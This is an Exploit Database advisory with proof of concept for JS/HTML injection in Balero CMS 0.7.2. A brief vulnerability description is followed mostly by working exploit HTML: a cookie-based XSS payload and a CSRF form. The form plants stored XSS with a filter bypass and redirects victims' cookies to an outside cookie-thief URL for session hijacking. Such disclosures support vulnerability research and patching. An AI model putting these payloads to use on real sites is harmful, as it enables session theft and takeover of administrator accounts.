Balero CMS 0.7.2 – Multiple JS/HTML Injection Vulnerabilities

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2015-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36676/

• <!--
  
  Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities
  
  Vendor: BaleroCMS Software
  Product web page: http://www.balerocms.com
  Affected version: 0.7.2
  
  Summary: Balero CMS is an open source project that can help you manage
  the page of your company with just a few guided steps, minimizing the
  costs that many companies make to have your advertising medium and/or
  portal.
  
  Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
  is not properly sanitised before being returned to the user. This can be
  exploited to execute arbitrary HTML and script code in a user's browser
  session in context of an affected site.
  
  Tested on: Apache 2.4.10 (Win32)
   PHP 5.6.3
   MySQL 5.6.21
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5239
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php
  
  
  04.03.2015
  
  -->
  
  
  <html>
  <body>
  <script>
  document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
  </script>
  </body>
  </html>
  
  
  csrf+stored xss+filter bypass+session hijack:
  
  <html>
  <body>
  <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
  <input type="hidden" name="title" value="ZSL" />
  <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
  <input type="hidden" name="files" value="joxy.poxy" />
  <input type="hidden" name="delete_post[]" value="135" />
  <input type="hidden" name="id" value="135" />
  <input type="hidden" name="submit" value="" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>